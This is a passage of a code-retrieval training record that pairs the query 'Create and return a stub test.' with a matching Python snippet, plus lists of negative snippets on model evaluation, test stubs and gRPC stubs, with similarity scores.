open('/home/jesus.molina/matchGT_matrix.csv', 'w') as csv_write:\n writer = csv.writer(csv_write, lineterminator='\\n')\n writer.writerows(matchGT_matrix)\n \n with open('/home/jesus.molina/FP_matrix.csv', 'r') as csv_file:\n newFileReader = csv.reader(csv_file)\n for row in newFileReader:\n FP_matrix.append(row)\n #print matchGT_matrix[1][0]\n\n with open('/home/jesus.molina/FP_matrix.csv', 'w') as csv_write:\n writer = csv.writer(csv_write, lineterminator='\\n')\n writer.writerows(FP_matrix) \n return 1\n #################################################################\n #################################################################\n #################################################################\n Pdd= _save_values_matrix\n \n metrics = eval_util.repeated_checkpoint_run(\n tensor_dict=tensor_dict,\n summary_dir=eval_dir,\n evaluators=get_evaluators(eval_config, categories),\n batch_processor=_process_batch,\n checkpoint_dirs=[checkpoint_dir],\n variables_to_restore=None,\n restore_fn=_restore_latest_checkpoint,\n num_batches=eval_config.num_examples,\n eval_interval_secs=eval_config.eval_interval_secs,\n max_number_of_evaluations=(1 if eval_config.ignore_groundtruth else\n eval_config.max_evals\n if eval_config.max_evals else None),\n master=eval_config.eval_master,\n save_graph=eval_config.save_graph,\n save_graph_dir=(eval_dir if eval_config.save_graph else ''))\n \n return metrics", "def build_evaluate_helper(cfg: CfgNode) -> EvaluateHelper:\n evaluator = build_evaluator(cfg.evaluator)\n helper = EvaluateHelper(evaluator)\n return helper", "def train(eps, total_num_eps, min_size, max_splits, nfeats_test):\n if len(eps) < min_size or max_splits == 0:\n return ExpressionDecisionLeaf.train(eps, total_num_eps, min_size, max_splits, nfeats_test)\n else:\n return ExpressionDecisionInner.train(eps, total_num_eps, min_size, max_splits, nfeats_test)", "def evaluate(self, epoch, data_source, arch_pool=None, fitnesses_dict=None, train_queue=None, criterion=None):\n\n fitnesses_dict = fitnesses_dict or {}\n total_avg_acc = 0\n total_avg_obj = 0\n\n # rank dict for the possible solutions\n model_specs_rank = {}\n model_specs_rank_before = {}\n queries = {}\n # as backup\n ind = 0\n eval_result = {}\n # let us sample 200 architecture to evaluate. 
# just keep the top K.\n\n # save the ranking, according to their GENOTYPE but not particle id\n rank_gens = sorted(model_specs_rank.items(), key=operator.itemgetter(1))\n\n self.ranking_per_epoch[epoch] = rank_gens\n self.eval_result[epoch] = eval_result\n # IPython.embed(header=\"Check evaluation result\")\n\n self.logger.info('VALIDATION RANKING OF PARTICLES')\n for pos, elem in enumerate(rank_gens):\n self.logger.info(f'particle gen id: {elem[1].geno_id}, acc: {elem[1].valid_acc}, obj {elem[1].valid_obj}, '\n f'hash: {elem[0]}, pos {pos}')\n\n return fitnesses_dict", "def evaluationset(self, batchsize=None, flatten=True):\n if batchsize is None:\n batchsize = self.batchsize\n\n return self.GENERATOR(self.x_eval, self.y_eval, batchsize, flatten=flatten, evaluate=True)", "def getFactoryEvaluateExpressionOnly(self):\n # factory function for evaluateExpressionOnly\n def evaluateExpressionOnly_factory(expression):\n return self.evaluateExpressionOnly(expression)\n\n return evaluateExpressionOnly_factory", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-sum' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'data2text'\n self.dimensions = ['naturalness', 'informativeness']", "def __init__(\r\n self,\r\n generator,\r\n mode,\r\n tensorboard=None,\r\n verbose=1,\r\n **kwargs\r\n ):\r\n self.generator = generator\r\n\r\n if mode == 'recall':\r\n self.evaluate = eval_recall\r\n elif mode == 'accuracy':\r\n self.evaluate = eval_accuracy\r\n elif mode == 'mAP':\r\n self.evaluate = eval_mAP\r\n else:\r\n raise ValueError('unsupported evaluation callback mode')\r\n self.mode = mode\r\n\r\n self.tensorboard = tensorboard\r\n 
self.verbose = verbose\r\n self.kwargs = kwargs\r\n\r\n super(Evaluate, self).__init__()", "def create_eval_model(model_creator, hparams, scope=None, extra_args=None):\n vocab_file = hparams.vocab_file\n graph = tf.Graph()\n\n with graph.as_default(), tf.container(scope or \"eval\"):\n vocab_table = vocab_utils.create_vocab_tables(vocab_file)[0]\n data_file_placeholder = tf.placeholder(shape=(), dtype=tf.string)\n kb_file_placeholder = tf.placeholder(shape=(), dtype=tf.string)\n data_dataset = tf.data.TextLineDataset(data_file_placeholder)\n kb_dataset = tf.data.TextLineDataset(kb_file_placeholder)\n # this is the eval_actual iterator\n eval_iterator = iterator_utils.get_iterator(\n data_dataset,\n kb_dataset,\n vocab_table,\n batch_size=hparams.batch_size,\n t1=hparams.t1.encode(),\n t2=hparams.t2.encode(),\n eod=hparams.eod,\n len_action=hparams.len_action,\n random_seed=hparams.random_seed,\n num_buckets=hparams.num_buckets,\n max_dialogue_len=hparams.max_dialogue_len)\n # this is the placeholder iterator\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(\n handle, eval_iterator.output_types, eval_iterator.output_shapes)\n batched_iterator = iterator_utils.get_batched_iterator(iterator)\n\n model = model_creator(\n hparams,\n iterator=batched_iterator,\n handle=handle,\n mode=tf.estimator.ModeKeys.EVAL,\n vocab_table=vocab_table,\n scope=scope,\n extra_args=extra_args)\n\n return EvalModel(\n graph=graph,\n model=model,\n placeholder_iterator=iterator,\n placeholder_handle=handle,\n eval_iterator=eval_iterator,\n data_file_placeholder=data_file_placeholder,\n kb_file_placeholder=kb_file_placeholder)", "def __init__(self, classifier, X, y, val_method, val_size, k, stratify):\n\t\tModel.counter += 1\n\n\t\tself.classifier = classifier\n\t\tself.X = X\n\t\tself.y = y\n\n\t\t# default name for the classifier\n\t\tself.name_ = 'classifier_' + str(Model.counter)\n\t\tself.type_ = ''\n\t\tself.comment_ = ''\n\t\tself.params_ = classifier.get_params()\t# hyperparameters of classifier\n\n\t\tif val_method == 'holdout':\n\t\t\tself.train_metrics, self.val_metrics = self.__hold_out_validation(\\\n\t\t\t\tclassifier, X, y, val_size, stratify)\n\t\telif val_method == 'cv':\n\t\t\tself.train_metrics, self.val_metrics = self.__cross_validation(\\\n\t\t\t\tclassifier, X, y, k, stratify)\n\t\telif val_method == 'loo':\n\t\t\tself.train_metrics, self.val_metrics = self.__cross_validation(\\\n\t\t\t\tclassifier, X, y, X.shape[0])\n\n\t\tself.test_metrics = None", "def evaluate_segmentations(\n samples,\n pred_field,\n gt_field=\"ground_truth\",\n eval_key=None,\n mask_targets=None,\n method=\"simple\",\n **kwargs,\n):\n fov.validate_collection_label_fields(\n samples, (pred_field, gt_field), fol.Segmentation, same_type=True\n )\n\n if mask_targets is None:\n if pred_field in samples.mask_targets:\n mask_targets = samples.mask_targets[pred_field]\n elif gt_field in samples.mask_targets:\n mask_targets = samples.mask_targets[gt_field]\n elif samples.default_mask_targets:\n mask_targets = samples.default_mask_targets\n\n config = _parse_config(pred_field, gt_field, method, **kwargs)\n eval_method = config.build()\n eval_method.register_run(samples, eval_key)\n\n results = eval_method.evaluate_samples(\n samples, eval_key=eval_key, mask_targets=mask_targets\n )\n eval_method.save_run_results(samples, eval_key, results)\n\n return results", "def fit(self, inputs: list) -> 'BasePreprocessor':", "def evaluate(self):\n raise NotImplementedError()", "def 
return_regressor_class(self):\n pass", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception(\"Error: Tester tried to use an invalid evaluation function: '%s'\" % eval_fn)", "def evaluate(self, features, labels):\n raise NotImplementedError('Not implemented')", "def getClassifier(self):\n return self.classify", "def evaluate(model, g, val_nid, device):\n model.eval()\n nfeat = g.ndata['features']\n labels = g.ndata['labels']\n with th.no_grad():\n pred = model.module.inference(g, nfeat, device, args.batch_size, args.num_workers)\n model.train()\n test_acc = Accuracy()\n return test_acc(th.softmax(pred[val_nid], -1), labels[val_nid].to(pred.device))", "def evaluate(self, batch_x, batch_y):\n raise NotImplementedError()", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.multiclass\n self.model = sklearn.multiclass.OneVsRestClassifier", "def create_eval(self):\n self.ev_id = \"ev-\" + base64.b32encode(os.urandom(10)).decode(\"ascii\")\n self.ev_name = \"Evaluation: \" + self.ml_name\n self._ml.create_evaluation(\n EvaluationId=self.ev_id,\n EvaluationName=self.ev_name,\n MLModelId=self.ml_id,\n EvaluationDataSourceId=self.fold.eval_ds_id\n )\n logger.info(\"Created Evaluation \" + self.ev_id)", "def _get_expression_evaluator(pipeline_builder):\n expression_evaluator = pipeline_builder.add_stage('Expression Evaluator')\n expression_evaluator.header_attribute_expressions = [\n {'attributeToSet': 'title', 'headerAttributeExpression': '${pipeline:title()}'},\n {'attributeToSet': 'name', 'headerAttributeExpression': '${pipeline:name()}'},\n {'attributeToSet': 'version', 'headerAttributeExpression': '${pipeline:version()}'},\n {'attributeToSet': 'id', 'headerAttributeExpression': '${pipeline:id()}'},\n ]\n return expression_evaluator, pipeline_builder", "def usesEvaluationManager(self):\n \n pass", "def evaluate(self, eval_data, eval_labels, eval_input_fn=\"default\"):\n # Validations:\n # If it is of type str, make sure is a valid\n if isinstance(eval_input_fn, str):\n # We use a list in case we want to extend in the future.\n if eval_input_fn in [\"default\"]:\n if eval_input_fn == \"default\":\n # pylint: disable=no-member\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_res = self.classifier.evaluate(input_fn=eval_input_fn)\n return eval_res", "def evaluate_design(self): # to update the pr object", "def evaluate(self, prediction_fn):\n pass", "def _eval_during_training(\r\n self, evaluator, output_path, save_best_model, epoch, steps):\r\n if evaluator is not None:\r\n score = evaluator(\r\n self, output_path=output_path, epoch=epoch, steps=steps)\r\n if score > self.best_score and save_best_model:\r\n self.save(output_path)\r\n self.best_score = score", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception, \"Error: Tester tried to use an invalid evaluation function: '%s'\" % eval_fn", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception, \"Error: Tester tried to use an invalid evaluation function: 
'%s'\" % eval_fn", "def setUp(self) -> None:\n fake_image = numpy.zeros(100)\n fake_pose = numpy.eye(4)\n fake_intrinsic = numpy.eye(3)\n self.evaluator = Evaluator(fake_image, fake_pose, fake_intrinsic, 1.0)\n self.evaluator.setComparisionImage(fake_image, fake_pose)\n return super().setUp()", "def evaluate(self, input_fn, eval_times, checkpoint_path=None):\n if not checkpoint_path:\n checkpoint_path = self._estimator.latest_checkpoint()\n\n if self._params.eval.type == 'customized':\n metrics = self._estimator.evaluate(\n input_fn, steps=eval_times, checkpoint_path=checkpoint_path)\n else:\n if not self._evaluator:\n self.prepare_evaluation()\n if checkpoint_path:\n current_step = int(os.path.basename(checkpoint_path).split('-')[1])\n else:\n current_step = 0\n predictor = self._estimator.predict(\n input_fn=input_fn,\n checkpoint_path=checkpoint_path,\n yield_single_examples=False)\n losses = collections.defaultdict(lambda: 0.0)\n\n counter = 0\n try:\n while eval_times is None or counter < eval_times:\n outputs = six.next(predictor)\n predictions = {}\n groundtruths = {}\n for key, val in outputs.items():\n if key[0:5] == 'pred_':\n predictions[key[5::]] = val\n if key[0:3] == 'gt_':\n groundtruths[key[3::]] = val\n if key[0:5] == 'loss_':\n losses[key[5::]] += np.mean(val)\n self._evaluator.update(\n predictions,\n groundtruths=(None if self._params.eval.use_json_file\n else groundtruths))\n counter = counter + 1\n tf.logging.info(\n f'Finish eval step {counter} out of total {eval_times} steps.')\n except (tf.errors.OutOfRangeError, StopIteration):\n logging.info(\n 'Evaluation reaches the end after running %d times.', counter)\n\n for key, val in outputs.items():\n if key[0:5] == 'loss_':\n losses[key[5::]] /= counter\n metrics = self._evaluator.evaluate()\n\n # Summary writer writes out eval metrics.\n output_dir = os.path.join(self._model_dir,\n 'eval' + self._params.eval.suffix)\n tf.gfile.MakeDirs(output_dir)\n summary_writer = tf.summary.FileWriter(output_dir)\n write_summary(metrics, summary_writer, current_step)\n write_summary(losses, summary_writer, current_step)\n summary_writer.close()\n\n logging.info('Eval result: %s', metrics)\n return metrics", "def __init__(self, method=\"RandomForest\", problem_type=\"infer\", rows_to_scan=\"all\"):\n self.feature_importances_ = None\n self.method = method\n self.problem_type = problem_type \n self.rows_to_scan = rows_to_scan", "def _eval_classifier(self):\n\n y_pred_baseline = self.df_baseline[self.score_column]\n y_pred_sample = self.df_sample[self.score_column]\n\n y_label_baseline = self.df_baseline[self.label_column]\n y_label_sample = self.df_sample[self.label_column]\n\n precision_baseline = precision_score(y_label_baseline, y_pred_baseline)\n recall_baseline = recall_score(y_label_baseline, y_pred_baseline)\n acc_baseline = accuracy_score(y_label_baseline, y_pred_baseline)\n f1_baseline = f1_score(y_label_baseline, y_pred_baseline)\n try:\n auc_baseline = roc_auc_score(y_label_baseline, y_pred_baseline)\n except ValueError:\n auc_baseline = \"NA\"\n\n precision_sample = precision_score(y_label_sample, y_pred_sample)\n recall_sample = recall_score(y_label_sample, y_pred_sample)\n acc_sample = accuracy_score(y_label_sample, y_pred_sample)\n f1_sample = f1_score(y_label_sample, y_pred_sample)\n try:\n auc_sample = roc_auc_score(y_label_sample, y_pred_sample)\n except ValueError:\n auc_sample = \"NA\"\n\n metrics_df = pd.DataFrame(\n {\n \"Accuracy\": [acc_baseline, acc_sample],\n \"Precision\": [precision_baseline, 
precision_sample],\n \"Recall\": [recall_baseline, recall_sample],\n \"F1\": [f1_baseline, f1_sample],\n \"AUC\": [auc_baseline, auc_sample],\n },\n index=[\"baseline\", \"sample\"],\n )\n\n self.performance_comparison = metrics_df", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def evaluate(self):\n raise NotImplementedError(\"Abstract method\")", "def __init__(self, trainingInputs, trainingOutputs, iterations):\n logging.debug(\"evostumps.__init(%s, %s)\" %(str(trainingInputs), str(trainingOutputs)))\n self.inputs = trainingInputs\n self.targets = trainingOutputs\n initialClassifier = WrappedClassifier(StumpsClassifier(len(trainingInputs[0])),self.inputs,self.targets)\n self.optimiser = ClassifierOptimiser(initialClassifier, iterations)", "def eval(self):\n return self.with_transforms(\"eval\")", "def __init__(self, method=\"RandomForest\", n_random_feature_ratio=5, problem_type=\"infer\", rows_to_scan=\"all\"):\n self.feature_importances_ = None\n self.method = method\n self.problem_type = problem_type \n self.rows_to_scan = rows_to_scan \n self.n_random_feature_ratio = n_random_feature_ratio", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def evaluate(parser):\n required_args = (\n 'train_tfrecord',\n 'valid_tfrecord',\n 'predicted_data',\n 'actual_data',\n )\n cli_args = add_all_args(parser, EVALUATION, *required_args)\n evaluator = Evaluator(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n 
train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n classes_file=cli_args.classes,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n )\n predicted = pd.read_csv(cli_args.predicted_data)\n actual = pd.read_csv(cli_args.actual_data)\n evaluator.calculate_map(\n prediction_data=predicted,\n actual_data=actual,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n save_figs=cli_args.save_figs,\n plot_results=cli_args.plot_stats,\n )" ]
[ "0.71334535", "0.71291125", "0.6881836", "0.6608917", "0.634653", "0.61560285", "0.5989048", "0.5923213", "0.5881174", "0.5840506", "0.58325845", "0.5785326", "0.5723227", "0.57039267", "0.5621444", "0.55563307", "0.5549682", "0.5542596", "0.55241853", "0.53976136", "0.5350896", "0.5350116", "0.533966", "0.5335079", "0.52759075", "0.5272946", "0.52468634", "0.52365065", "0.5229169", "0.5224481", "0.5223818", "0.5203205", "0.520289", "0.518581", "0.5166878", "0.5152012", "0.51458955", "0.51417", "0.51411057", "0.5128586", "0.51193786", "0.5115262", "0.510474", "0.50986403", "0.5087352", "0.50826067", "0.50749815", "0.50748616", "0.50689936", "0.5065001", "0.50566554", "0.50499094", "0.50491774", "0.5048958", "0.5046168", "0.50415003", "0.5028072", "0.50280166", "0.5025696", "0.5009525", "0.49841237", "0.49556243", "0.49411407", "0.4929591", "0.4914255", "0.49119204", "0.48874325", "0.488485", "0.4884647", "0.4883122", "0.48719546", "0.487013", "0.4857894", "0.485098", "0.4850586", "0.48491925", "0.48485124", "0.48463067", "0.48447064", "0.48441178", "0.48439765", "0.48394516", "0.48360398", "0.48353642", "0.48342377", "0.48329335", "0.48269716", "0.48256394", "0.48256394", "0.48117694", "0.4811469", "0.4811386", "0.4809421", "0.480043", "0.47996414", "0.47960284", "0.47940275", "0.47869623", "0.47850448", "0.47844353" ]
0.5575173
15
Create and return a stub test.
def CreateStubTest(phases=None): # pylint: disable=invalid-name
  test_metadata = phase_data.TestMetadata('foo')
  return phase_data.phase_data(test_metadata, phases or [])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def CreateStubTest(phases=None, params=None): # pylint: disable=invalid-name\n test_metadata = htftest.TestMetadata('foo')\n # pylint: disable=protected-access\n if params is not None:\n test_metadata._parameter_list = (\n parameters.TestParameterList(params.parameters))\n return htftest.HTFTest(test_metadata, phases or [])", "def test_stub(self):\n pass", "def create_stub(cls, proto_py_module, stub_name):\n\n return cls.create_stubs(proto_py_module, stub_name)", "def test_stub() -> None:\n test_val = 3\n assert test_val == 3", "def make_test_object(self):\n return self.orm_cls.testing_create()", "def test_new(self):", "def test_new(self):", "def create_instance(test_id, config, args):\n return TestT1Detail(test_id, config, args)", "def test_create(api: API):\n api.user.create.return_value = 123456\n account = Account(api, \"USERNAME\", \"PASSWORD\")\n api.user.create.assert_called_once()\n assert account.create()", "def create_test_node():\n node = cmds.createNode(\"unknown\")\n _add_test_attrs_to_node(node)\n return node", "def create_stubs(cls, proto_py_module, *stub_names):\n\n return cls(proto_py_module, *stub_names).stubs", "def make_shell_test(name):\n test = Test(name)\n test.add_step(\"run\", step_run, checks=[\n check_retcode_zero,\n create_check_reference_output(name+\".ref\"),\n ], allow_retries=3)\n return test", "def _new(self):\n return self.lib.iperf_new_test()", "def test_dummy():", "def file_factory(test_workspace):\n\n return FileCreator(test_workspace)", "def test_create_run(self):\n pass", "def create_test_service(context, **kw):\n service = get_test_service(context, **kw)\n service.create()\n return service", "def generate_test_method(test_name):\n\n def run_test(self):\n # backup any existing files with our expected output_name\n output_name = \"{}.png\".format(test_name)\n backup_name = output_name + \".backup\"\n if os.path.isfile(output_name):\n os.rename(output_name, backup_name)\n self.addCleanup(cleanup_backup, backup_name, output_name)\n\n # run the test\n ret = subprocess.call(\"python {}.py\".format(test_name), shell=True)\n self.assertEqual(ret, 0)\n\n output_exists = os.path.isfile(output_name)\n if output_exists:\n self.addCleanup(cleanup_output, output_name)\n\n ps_output_name = \"{}.ps\".format(test_name)\n if os.path.isfile(ps_output_name):\n # some tests may also generate postscript files which need to be deleted\n self.addCleanup(cleanup_output, ps_output_name)\n\n self.assertTrue(output_exists)\n\n return run_test", "def test_dummy_test():\n pass", "def test_create(self):\n pass", "def create_mock_api_factory(cls):\n mock_api, mock_scheduler_client = cls.create_mock_api()\n mock_api_factory = Mock()\n mock_api_factory.return_value = mock_api\n return mock_api_factory, mock_scheduler_client", "def beta_create_GNMITest_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('gnmitest.GNMITest', 'Run'): github_dot_com_dot_openconfig_dot_gnmitest_dot_proto_dot_suite_dot_suite__pb2.Suite.SerializeToString,\n }\n response_deserializers = {\n ('gnmitest.GNMITest', 'Run'): github_dot_com_dot_openconfig_dot_gnmitest_dot_proto_dot_report_dot_report__pb2.Report.FromString,\n }\n cardinalities = {\n 'Run': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return 
beta_implementations.dynamic_stub(channel, 'gnmitest.GNMITest', cardinalities, options=stub_options)", "def test_create10(self):\n pass", "def _create_stub(target, port):\n channel = gnmi_pb2_grpc.grpc.insecure_channel(target + ':' + port)\n return gnmi_pb2_grpc.gNMIStub(channel)", "def create_access_test(fullpath):\n try:\n verify_test_exists(fullpath)\n except:\n add_test(fullpath)\n access_test(fullpath)", "def test_create(session, client, jwt, desc, json_data, roles, status, has_account):\n current_app.config.update(PAYMENT_SVC_URL=MOCK_PAY_URL)\n current_app.config.update(AUTH_SVC_URL=MOCK_URL_NO_KEY)\n headers = None\n # setup\n if has_account and BCOL_HELP in roles:\n headers = create_header_account(jwt, roles, 'test-user', BCOL_HELP)\n elif has_account and GOV_ACCOUNT_ROLE in roles:\n headers = create_header_account(jwt, roles, 'test-user', '1234')\n elif has_account:\n headers = create_header_account(jwt, roles)\n else:\n headers = create_header(jwt, roles)\n\n # test\n response = client.post('/api/v1/financing-statements',\n json=json_data,\n headers=headers,\n content_type='application/json')\n\n # check\n assert response.status_code == status\n if response.status_code == HTTPStatus.CREATED:\n registration: Registration = Registration.find_by_registration_number(response.json['baseRegistrationNumber'],\n 'PS12345', True)\n assert registration.verification_report", "def createMakingTest(tx, query, personId, testId, date, hour, result):\n tx.run(query, personId=personId, testId=testId, date=date, hour=hour, result=result)", "def create_test_goal(context, **kw):\n goal = get_test_goal(context, **kw)\n goal.create()\n return goal", "def __new__(cls, name, func_call, expect_dir=None, expect_base=None,\n ext='json', covers=None, breakpoints=None, break_funcs=()):\n breakpoints = breakpoints or []\n if not breakpoints or break_funcs:\n for f in break_funcs or (func_call.func,):\n if hasattr(f, 'im_func'):\n f = f.im_func\n breakpoints.append((f.func_code.co_filename,\n f.func_code.co_firstlineno,\n f.func_code.co_name))\n\n expect_dir = expect_dir.rstrip('/')\n return super(Test, cls).__new__(cls, name, func_call, expect_dir,\n expect_base, ext, covers, breakpoints)", "def Generatable(cls):\n if hasattr(cls, 'generate_tests') and callable(cls.generate_tests):\n def create_test_func(name, test_func):\n setattr(cls, 'test_' + name.replace(' ', '_').lower(), test_func)\n cls.generate_tests(create_test_func)\n return cls", "def test_create(self):\n self.app\n pass", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def instantiate_for_expectation(self, testcase):\n raise PlaceHolderException('Subclass should implement this function.')", "def stub_init(self, *args, **kwargs):\n self.data = ReturnValueStub()\n self.data.name = self.__class__.__name__\n self.name = self.data.name\n self.set_stub_resources()", "def make_suite():\n suite = unittest.TestSuite()\n return suite", "def test__call__(self):\n mock = Mock()\n factory = Factory(mock)\n factory()\n mock.assert_called_once_with()", "def test_create(self):\n path = self.tmp_py()\n # Creating a file that doesn't exist should succeed\n self.cls.create(path)\n self.assertTrue(os.path.exists(path))\n # Created file should be a valid script (If not, raises an error)\n self.cls.verify(path)\n # Can't create it again: it already exists\n self.assertRaises(exceptions.PathFoundError,self.cls.create,path)", "def 
create_test_instance(cls, **kwargs):\n # create a instance with random parameters\n obj = super(LibraryBinaryNumeric, cls).create_test_instance(**kwargs)\n # choose an optimal interaction matrix\n obj.choose_sensitivity_matrix('auto')\n return obj", "def create_test_port(**kw):\n port = get_test_port(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del port['id']\n dbapi = db_api.get_instance()\n return dbapi.create_port(port)", "def testClone(self):\n stub = MockStub()\n deadline = 1.0\n rpc = apiproxy_rpc.RPC(stub=stub, deadline=deadline)\n\n\n rpc_clone = rpc.Clone()\n self.assertEqual(rpc_clone.deadline, rpc.deadline)\n self.assertNotEqual(rpc_clone.MakeCall, rpc.MakeCall)", "def test_let(self):", "def get_blueprint_tester(client, blueprint_dir):\n sys.path.append(blueprint_dir)\n fixture = importlib.import_module(\"blueprint_fixture\")\n return fixture.BlueprintTest(client)", "def create_test_wallet_1(sequence):\n private_key = get_private_key_from_mnemonic(\n \"slot live best metal mandate page hover tank bronze code \" \\\n \"salad hill hen salad train inmate autumn nut home city \" \\\n \"shield level board measure\"\n )\n\n # get wallet\n wallet = Wallet(private_key, BinanceNetwork.TEST)\n\n # mock waller info\n wallet.account_number = 0\n wallet.sequence = sequence\n wallet.chain_id = \"test-chain-n4b735\"\n\n # double check to make sure wallet is valid\n assert wallet.address == \"tbnb12n2p6zcvgcpumyexqhnp3q9tc2327l39ycfnyk\"\n\n return wallet", "def create_model(self):\n self.skipTest(\"Base module should not be tested.\")", "def to_stub(self, name, description):\n if(not self._constructed): raise EGCSUnconstructedStateError()\n return EGStub(name, description, self._nbits, self._prime, \n self._generator)", "def test__init__(self):\n mocked_reconstructor = Mock()\n mocked_reconstructor.reconstruct.return_value = 'mocked'\n db_response = {'Item': {'test': True}}\n resp = GetResponse(db_response, mocked_reconstructor)\n assert resp.item == 'mocked'\n mocked_reconstructor.reconstruct.assert_called_with(db_response['Item'])", "def suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(CreateV1TestCase))\n suite.addTest(unittest.makeSuite(CreateV2TestCase))\n return suite", "def beta_create_Hetr_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('Hetr', 'BuildTransformer'): BuildRequest.SerializeToString,\n ('Hetr', 'Computation'): ComputationRequest.SerializeToString,\n ('Hetr', 'FeedInput'): FeedInputRequest.SerializeToString,\n ('Hetr', 'GetResults'): GetResultsRequest.SerializeToString,\n }\n response_deserializers = {\n ('Hetr', 'BuildTransformer'): BuildReply.FromString,\n ('Hetr', 'Computation'): ComputationReply.FromString,\n ('Hetr', 'FeedInput'): FeedInputReply.FromString,\n ('Hetr', 'GetResults'): GetResultsReply.FromString,\n }\n cardinalities = {\n 'BuildTransformer': cardinality.Cardinality.UNARY_UNARY,\n 'Computation': cardinality.Cardinality.UNARY_UNARY,\n 